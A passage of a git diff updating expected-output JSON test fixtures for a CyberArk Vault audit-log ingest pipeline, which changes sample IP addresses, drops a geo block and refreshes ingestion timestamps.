\u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:08:48\",\"IsoTimestamp\":\"2021-03-11T21:08:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)testing(Connection to address: 67.43.156.15)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"testing\",\"RetrieveAction\":\"Connect\"},\"ConnectionDetails\":{\"ConnectionAddress\":\"67.43.156.15\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", "action": "retrieve ssh key", 
@@ -244,20 +226,11 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "34.123.103.115",
 "user": {
 "name": "adrian"
 },
- "ip": "34.123.103.115"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "source": {
 "user": {
@@ -280,7 +253,7 @@
 },
 "@timestamp": "2021-03-15T13:18:52.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian"
+ "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian"
 },
 "ecs": {
 "version": "1.12.0"
@@ -292,7 +265,7 @@
 ],
 "ip": [
 "127.0.0.1",
- "34.123.103.115",
+ "67.43.156.15",
 "10.0.1.20"
 ]
 },
@@ -302,7 +275,7 @@ "reason": "(Action: Retrieve SSH key)", "iso_timestamp": "2021-03-15T13:18:52Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Retrieve SSH Key", "issuer": "Administrator", "pvwa_details": { @@ -316,12 +289,12 @@ "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Retrieve SSH Key", 
@@ -335,8 +308,8 @@ "event": { "severity": 2, "reason": "(Action: Retrieve SSH key)", - "ingested": "2021-06-09T10:24:35.337724300Z", - "original": "\u003c5\u003e1 2021-03-15T13:18:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:52\",\"IsoTimestamp\":\"2021-03-15T13:18:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:04.741510100Z", + "original": "\u003c5\u003e1 2021-03-15T13:18:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
06:18:52\",\"IsoTimestamp\":\"2021-03-15T13:18:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", "action": "retrieve ssh key", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json index 14516c9ea85..4b6b6cb97d7 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json 
@@ -49,7 +49,7 @@ "event": { "severity": 2, "action": "create discovery succeeded", - "ingested": "2021-06-09T10:24:35.458324400Z", + "ingested": "2021-12-09T13:37:05.172001500Z", "original": "\u003c5\u003e1 2021-03-14T12:06:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:06:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:06:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e449\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate Discovery Succeeded\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eCreate Discovery Succeeded\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eStatus:Success; Discovery:\u003cWindows discovery from ELASTIC.local\u003e; Reason:;\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate Discovery Succeeded\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:06:35\",\"IsoTimestamp\":\"2021-03-14T12:06:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"449\",\"Desc\":\"Create Discovery 
Succeeded\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create Discovery Succeeded\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Status:Success; Discovery:\u003cWindows discovery from ELASTIC.local\u003e; Reason:;\",\"ExtraDetails\":\"\",\"Message\":\"Create Discovery Succeeded\",\"GatewayStation\":\"\"}}}", "code": "449", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json index c180ebb321e..f2db8d5101b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json 
@@ -76,7 +76,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-06-09T10:24:35.480432400Z", + "ingested": "2021-12-09T13:37:05.315103200Z", "original": "\u003c5\u003e1 2021-03-08T10:19:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 02:19:42\",\"IsoTimestamp\":\"2021-03-08T10:19:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=2;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" 
@@ -158,7 +158,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-06-09T10:24:35.480443300Z", + "ingested": "2021-12-09T13:37:05.315115400Z", "original": "\u003c5\u003e1 2021-03-10T14:38:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:38:57\",\"IsoTimestamp\":\"2021-03-10T14:38:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=1;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" 
@@ -241,7 +241,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-06-09T10:24:35.480446Z", + "ingested": "2021-12-09T13:37:05.315123500Z", "original": "\u003c5\u003e1 2021-03-14T11:48:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 04:48:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T11:48:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e459\u003c/MessageID\u003e\\n \u003cDesc\u003eGeneral Audit\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eGeneral Audit\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eDual account rotation\u003c/Reason\u003e\\n \u003cExtraDetails\u003eDualAccountStatus=Active;Index=2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eGeneral Audit\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615419568\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Active\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 04:48:26\",\"IsoTimestamp\":\"2021-03-14T11:48:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General 